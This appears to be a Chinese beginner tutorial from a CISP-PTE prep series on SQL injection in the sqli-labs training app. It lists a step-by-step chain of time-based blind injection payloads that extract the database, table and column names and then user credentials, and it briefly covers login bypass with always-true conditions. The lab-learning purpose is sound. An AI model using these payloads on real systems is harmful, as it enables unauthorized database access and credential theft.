网安入门06-Sql注入(时间盲注&万能密码)


以第9关为例:无论输入任何参数,页面显示一样,没有两种状态可以判断,无法使用布尔盲注
网安入门06-Sql注入(时间盲注&万能密码)_第1张图片

时间盲注

?id=1' and if(1=1,sleep(5),1)--+
判断参数构造。
?id=1'and if(length((select database()))>9,sleep(5),1)--+
判断数据库名长度 
?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+
逐一判断数据库字符
?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+
判断所有表名长度
?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+
逐一判断表名
?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+
判断所有字段名的长度 
?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+
逐一判断字段名。
?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+
判断字段内容长度 
?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+
逐一检测内容。

万能密码

Less11
使用恒成立的sql语句来进入后台
网安入门06-Sql注入(时间盲注&万能密码)_第2张图片
还可以继续手工注入 网安入门06-Sql注入(时间盲注&万能密码)_第3张图片
Less12
网安入门06-Sql注入(时间盲注&万能密码)_第4张图片
先判断是否存在注入点网安入门06-Sql注入(时间盲注&万能密码)_第5张图片
再找出显示位(回显点)
网安入门06-Sql注入(时间盲注&万能密码)_第6张图片Less15,16
不提供报错信息,需要布尔盲注,不深究了
网安入门06-Sql注入(时间盲注&万能密码)_第7张图片

你可能感兴趣的:(CISP-PTE备考之路,sql,数据库,oracle)